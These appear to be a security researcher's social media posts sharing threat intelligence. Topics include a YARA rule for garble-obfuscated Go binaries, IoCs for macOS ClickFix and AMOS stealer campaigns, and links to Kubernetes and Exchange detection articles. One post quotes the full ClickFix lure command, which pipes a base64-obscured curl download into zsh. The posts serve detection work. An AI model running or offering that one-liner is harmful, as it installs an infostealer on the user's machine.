Anton

The core logic looks like this: $garble_buildinfo = { FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A [8-128] 07 75 6E 6B 6E 6F 77 6E } This matches the Go buildinfo magic (0xff + ASCII " Go buildinf:") followed by linker TLV fields and a UTF-8 version record set to "unknown" — a layout commonly produced by garble instead of something like "\x08go1.22.0". As a result, I found a number of interesting samples on ANY.RUN, including binaries for multiple platforms. Maybe this will be useful to someone. It's still more fun than AI slops with emojis. #malware #obfuscation #go #macos #detection #yara #soc

It’s getting ridiculous how little effort Google seems to put into stopping ClickFix campaigns abusing its own infrastructure. Attackers are actively using sites.google.com for phishing pages, while Google Ads keeps promoting malicious domains with well-known and easily recognizable patterns. Companies cannot realistically block Google infrastructure entirely, so it would be great if Google actually took responsibility for protecting users instead of just hosting the abuse. Right now the workflow seems to be: 1. Take money from attackers for ads 2. Deliver malware to users 3. Remove the content after enough reports This should not be the normal state of the internet in 2026. #ClickFix #macOS #malware #phishing #security #google

New AMOS campaign details. Attackers are using a phishing page hosted on sites.google.com, tricking users into executing a malicious command in Terminal: hxxps://api-metrics-5453[.]com/curl/3e97b0eddfddb28e10008f9348381b2665e1ad12476315b24a64808696c3347b The bash script downloads and launches the next-stage stager: “helper”. “helper” is a heavily obfuscated loader/dropper. It does not steal data directly, but prepares and launches the next stage (AMOS stealer + backdoor). The rest you already know. Infrastructure: api-metrics-5453[.]com — first stage prismdata48[.]com — Phishing site solidlattice65[.]com — Phishing site #AMOS #STEALER #macOS #malware #detection

Related report for this campaign - cloudsek.com/blog/macsync-s…

New ClickFix attack observed. This time, the attackers mimicked a fake Homebrew website. Execution of the terminal command launches an AppleScript-based stealer via osascript. Additionally, if the victim has "Trezor Suite.app" installed, the malware drops a malicious /Contents/Resources/app.asar (Electron app) to steal user data. IoCs: • bcrealestateagency[.]com — C2 domain • checkbabikme[.]com — phishing resource • 0d9db8ab9ae36598db07a0a364b156ee6c3c11a44946077efee409855518c4b6 — SHA256 of malicious app.asar #malware #macos #ClickFix #SOC #ThreadDetection #stealer

This is my article about threat detection approaches in Kubernetes environments. I hope some of the ideas, detections, or monitoring techniques will be useful for other SOC/Detection Engineering teams working with K8s Topics covered: • K8s threat detection • Audit logs • Falco • SIEM detections • Threat hunting approaches medium.com/exness-blog/th… #Kubernetes #K8S #ThreatDetection #SOC #DetectionEngineering #CyberSecurity

Recently discovered another phishing resource leveraging the ClickFix pattern. The victim is instructed to execute the following command in Terminal: echo "Downloading Codex: https://persistent.oaistatic[.]com/codex-app-prod/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9hcmJva2ZpbmQuY29tL2N1cmwvMDMyNmJiNjRhMTUyNWNkMTlkMGQ5YWE3MmZmOGZhOWVlY2NmNmVhNWY1NWIwZTJmY2MwMzk2YWM2MjNhM2Q3OQ==" | openssl base64 -d -A) | zsh Result: execution of an infostealer on the victim’s macOS host. Microsoft recently published related research on similar campaigns: microsoft.com/en-us/security… IoCs: • ClickFix lure website: devvtracker[.]com • C2 domain hosting stager: arbokfind[.]com • C2 IP receiving stolen data: 45.94.47[.]112 #ClickFix #Malware #Stealer #macOS #SOC #ThreatDetection

Hunting Down MS Exchange Attacks. Part 2 - other notorious vulnerabilities. Great work @BigToni94 and @bizone_en SOC detection team👏👏👏 #threathunting #microsoft #exchange bi-zone.medium.com/hunting-down-m…

Thanks to @BlackMatter23 for technical review of the article!

Some days ago I and @BigToni94 provided talk about Hunting for MS Exchange/Outlook persistence TTPs on @phdays conference. Slides are available now! #ThreatHunting #ThreatDetection #DFIR #infosec #SOC #incidentresponse #phdays #phdays10 speakerdeck.com/heirhabarov/hu…

I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482) link.medium.com/a2T3FpCjLfb

Want to know how to hunt for ProxyLogon exploitation attempts? We’ve prepared this article for you! #proxylogon #secops #threathunting #dfir #vulnerability #bizone bi-zone.medium.com/hunting-down-m…

Microsoft Exchange #ProxyLogon detection recipes from @bizone_en SOC team (in Russian). English version is coming soon. Special thanks to @BigToni94 an @_drd0c. habr.com/ru/company/biz… #secops #proxylogon #msexchange #microsoft